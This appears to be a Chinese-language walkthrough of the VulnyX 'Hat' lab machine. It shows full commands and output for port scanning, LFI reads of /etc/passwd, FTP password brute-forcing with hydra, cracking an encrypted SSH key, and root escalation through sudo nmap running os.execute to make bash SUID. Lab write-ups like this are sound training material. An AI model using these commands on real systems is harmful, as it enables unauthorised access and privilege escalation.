Vlx_Hat

靶机来源： https://vulnyx.com/

难度：Medium

思维导图：

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:53 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00079s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00052s latency).
MAC Address: 08:00:27:AE:E2:AB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.8
Host is up (0.0011s latency).
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.64 seconds
靶机IP：`192.168.2.8`

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.8                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:54 +0800
Nmap scan report for 192.168.2.8
Host is up (0.00045s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    filtered ssh
80/tcp    open     http
65535/tcp open     unknown
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds

开放端口：80、65535 22端口处于过滤状态

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,65535 192.168.2.8
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:54 +0800
Nmap scan report for 192.168.2.8
Host is up (0.00074s latency).

PORT      STATE    SERVICE VERSION
22/tcp    filtered ssh
80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
65535/tcp open     ftp     pyftpdlib 1.5.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.2.8:65535
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.8                          
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 09:55 +0800
Nmap scan report for 192.168.2.8
Host is up (0.0011s latency).
All 100 scanned ports on 192.168.2.8 are in ignored states.
Not shown: 53 closed udp ports (port-unreach), 47 open|filtered udp ports (no-response)
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 53.72 seconds

二、WEB渗透

1、80端口

访问80端口，是Apache的默认页面

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.8 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
...
logs                 (Status: 301) [Size: 309] [--> http://192.168.2.8/logs/]
php-scripts          (Status: 301) [Size: 316] [--> http://192.168.2.8/php-scripts/]
...

找到两个目录：/logs、/php-scripts，尝试访问无任何东西

1.logs

尝试再对目录/logs进行扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.8/logs/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x log   

vsftpd.log           (Status: 200) [Size: 1760]

查看vsftpd.log

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.8/logs/vsftpd.log                                                                                 

[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:43:57] concurrency model: async
[I 2021-09-28 18:43:57] masquerade (NAT) address: None
[I 2021-09-28 18:43:57] passive ports: None
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect).
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
[I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).

找到FTP的登录用户名是admin_ftp

2.php-scripts

再对目录/php-scripts进行扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.8/php-scripts/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php   

file.php             (Status: 200) [Size: 0]

访问file.php，是一个空白页面

三、文件包含LFI

尝试对file.php的参数进行模糊测试

┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://192.168.2.8/php-scripts/file.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt  -fs 20  -ac 

6                       [Status: 200, Size: 1404, Words: 13, Lines: 27, Duration: 9ms]

找到一个参数6

1.获取用户名

读取/etc/passwd

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.8/php-scripts/file.php?6=/etc/passwd

root:x:0:0:root:/root:/bin/bash
cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash

找到用户cromiphi

2.获取IPv6地址

由于端口 22 处于过滤状态，因此查看文件 /proc/net/if_inet6 来获取 IPv6 地址

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.8/php-scripts/file.php?6=/proc/net/if_inet6
fe800000000000000a0027fffe85a933 02 40 20 80   enp0s3
00000000000000000000000000000001 01 80 10 80       lo

正确的处理一下IPv6的格式

┌──(root㉿kali)-[~/miaosec]
└─# curl -sX GET "http://192.168.2.8/php-scripts/file.php?6=/proc/net/if_inet6" |awk 'NR==1 {print $1}' | fold -w4 | paste -sd ":"
fe80:0000:0000:0000:0a00:27ff:fe85:a933

得到IPv6的地址：fe80:0000:0000:0000:0a00:27ff:fe85:a933

使用nmap扫描一下IPv6开放的端口

┌──(root㉿kali)-[~/miaosec]
└─# nmap -6 -p- fe80:0000:0000:0000:0a00:27ff:fe85:a933%eth1
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 14:55 +0800
Nmap scan report for fe80::a00:27ff:fe85:a933
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:85:A9:33 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.71 secondss

发现开放着22和80端口

四、Ftp-pyftpdlib

端口65535开放的服务是pyftpdlib pyftpdlib 1.5.4 是一个用 Python 编写的 FTP 服务器库，它允许你快速搭建一个功能完整的 FTP（File Transfer Protocol）服务，和ftp服务一样

使用ftp的进行连接，需要密码

┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.8 65535
Connected to 192.168.2.8.
220 pyftpdlib 1.5.4 ready.
Name (192.168.2.8:root): admin_ftp
331 Username ok, send password.
Password: 
530 Authentication failed.
ftp: Login failed
ftp> 
ftp> exit
221 Goodbye.

使用hydra对ftp服务的密码进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 4 -l admin_ftp -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.8:65535

[65535][ftp] host: 192.168.2.8   login: admin_ftp   password: cowboy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-26 11:41:16

成功获取到凭证：admin_ftp:cowboy

登录ftp服务

┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.8 65535
Connected to 192.168.2.8.
220 pyftpdlib 1.5.4 ready.
Name (192.168.2.8:root): admin_ftp
331 Username ok, send password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls 
229 Entering extended passive mode (|||34371|).
125 Data connection already open. Transfer starting.
drwxrwxrwx   2 cromiphi cromiphi     4096 Sep 28  2021 share
226 Transfer complete.

将文件下载到本地

ftp> get id_rsa
ftp> get note

查看note

┌──(root㉿kali)-[~/miaosec]
└─# cat note                                      
Hi,

We have successfully secured some of our most critical protocols ... no more worrying!

Sysadmin

查看id_rsa

┌──(root㉿kali)-[~/miaosec]
└─# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,6F30B7B22B088AB2

JmLJqI4m9jk1McrIzNFyuYrPyPu3Znw6awuyEIK0ZctgYabjNk5MVCM0FH45SQCl
rqK3QqSACiOq4+DnMWrECj5CO+JPzGjIupgz8IrW0Cr7mkRSNa9fCeEBrIzAi924
GEM72PMuwlBM4zWDZ/962gtZpDnzXYLc9mYdVTe+ubI2NrVC6d2ak1L5GMsBdYwi
BVj8bhnUsr4doXi1ZcRAZoHUses/Z8ohfNXkUoDO2d1kQmiE0hAVEUnBerzV+E84
GpJFBgHphboG9E+R3Gh27viM3pY0qFvU/PWbTJ8Y6LgSgJPMLldlEuBEym0LPDpc
27L7wdKEYwCjPWBGtuGnKsdfleQfsyKijH8/YDlH0hsrDc83ZMcDR13jtfZbZjHZ
IwVdhUuKdHp6Ig4lmxi1RqJA35CD6ZHHMzOKlm1TjQskA0j6jdPeJ3o5ebh/z3oe
tr3FKEawz+2KQa+CX+frCwN/rLFUc8MOvh7I4/jJ9o2kdKB0u5OHH+pgXfmhTJzl
mVSqOtti7cxefUb142Jltku5kElwKdvVEHw+qmZNMwrw+Kv7rlpvezfsW4uzm8Je
nlmxXoMl62Z3FKPjKarEqZrbO6bHf6lWAIrJgJGydRn1tpD/IY1DJZKwa0aLrkbr
7hu8C0LSpIVdy5ZUSaT04ZL/FBxDQR7cg2/ZYF5Kc1pvIgjXrlEsbbSPDyg2bLIW
eCMRnevvsTS8l55qUvQ2GO73kHMcWfkAsvUaojLiSxXGTcd+gPf6kXiwTbz2wbTR
KPzDwKaTn74yW+9jc88+6D8CdT6OrN+2eP8K0ukdNwMqVc+Mag0TOOCwq+QVfKwf
O7A+3+13xjUy1/TKRIJDXuhL88RDrzA7U4uy9ZDYEq5z2HVc3agqnHMBP4k2n0KE
u2YoCNOp52Q4YpKoXoz5Ojw8CuUIhNqoilh/0j+gkdgIO5jMAEBT7p6M/fnhfHpe
VNCimSJfTjLCU49Tez0HeDDCuE4oG/vShjM0ebZHMMWTY8vVOaRz4Ktcx938Jpnj
/j9Z0NEAEUI2ISZGGDLS/O0fhyN9lsl1UrY2yR3NnXgbX3YkjWLDM4C8mWSCejpl
XhWSUYlt8X83atlUfTcn97QVGeJXvlJhBUrYEtsTHjDc2lsH3KQNYtpckQizpcyW
axJjIeWhI+eqWIVwsXTxKI2hIa6XuYdjUP7cusDad+pUo1Y7h0wTwLP1KYtkXrm3
sEvB8X2mX6tHB+1iO67UKjFdZ7Ti1Q2XY6zCCbOl3S5b24MFAFANDYgkr1QtgQqs
j+tSrrd1yOn4AeM6SdyLdVxKQBY2s0+9dvLmaJLH9OOdV0G4I4WcMuum40WMzXrf
fBAMIh7Gl0lEWPOrPtOxrQI++kAlyzNTK1oxSvdc/f30TOB4hGH8yU3EKzRh/QTa
fHkcKP9V7Y0xKwrg2yLuWsFSt4QnFUZEbV+wDq2i9NqvriYOxSa2qarPP04FVZRp
5xYdSGWdMuPFTEAaM+67wR33zzlYKvnEmE9CRHnAqVpqHFuNmgYD+S3KhzW3X1A3
zlflWacIB06p/cXCr3w6XNqa0y2TsNmuT2IR6JX+Qr6usNV4QWL/Jyyy4dE1oBG6
-----END RSA PRIVATE KEY-----

五、RSAcrack

由于id_rsa需要密码进行登录，因此使用crack进行爆破

┌──(root㉿kali)-[~/Tool]
└─# ./RSAcrack -k ../miaosec/id_rsa -w techyou.txt 

 ╭━━━┳━━━┳━━━╮          ╭╮  
 ┃╭━╮┃╭━╮┃╭━╮┃          ┃┃  
 ┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
 ┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
 ┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
 ╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
 code: d4t4s3c   ver: v1.0.0
─────────────────────────────
[i] Cracking | ../miaosec/id_rsa
[i] Wordlist | techyou.txt
[*] Status   | 1594/20000/7%/ilovemyself
[+] Password | ilovemyself
─────────────────────────────

找到密钥的密码是ilovemyself

六、获取cromiphi权限

使用凭证连接

┌──(root㉿kali)-[~/miaosec]
└─# ssh -i id_rsa -6 cromiphi@'fe80:0000:0000:0000:0a00:27ff:fe85:a933%eth1'
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_rsa': 
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
cromiphi@hat:~$ id
uid=1000(cromiphi) gid=1000(cromiphi) groups=1000(cromiphi)

七、权限提升

查看sudo -l

cromiphi@hat:~$ sudo -l
Matching Defaults entries for cromiphi on hat:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cromiphi may run the following commands on hat:
    (root) NOPASSWD: /usr/bin/nmap

可以执行/usr/bin/nmap

由于nmap 的脚本引擎使用 Lua 语言，而 os.execute() 是 Lua 中执行系统命令的函数 因此创建一个临时文件，路径存入变量 TF，将执行的命令写入到变量TF，执行nmap的脚本扫描即可

cromiphi@hat:~$ TF=$(mktemp)
cromiphi@hat:~$ echo 'os.execute("chmod 4755 /bin/bash")' > $TF
cromiphi@hat:~$ sudo /usr/bin/nmap --script=$TF
Starting Nmap 7.70 ( https://nmap.org ) at 2026-03-26 07:59 CET
NSE: Warning: Loading '/tmp/tmp.njpnct0nSV' -- the recommended file extension is '.nse'.
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:626: /tmp/tmp.njpnct0nSV is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:626: in field 'new'
        /usr/bin/../share/nmap/nse_main.lua:828: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1315: in main chunk
        [C]: in ?

QUITTING!
cromiphi@hat:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash

成功获取到root权限

cromiphi@hat:~$ /bin/bash -p
bash-5.0# id
uid=1000(cromiphi) gid=1000(cromiphi) euid=0(root) groups=1000(cromiphi)

八、查看FLAG

bash-5.0# cat /root/root.txt /home/cromiphi/user.txt 
8b4acc39c4d068623a16a89ebecd5048
d3ea66f59d9d6ea12351b415080b5457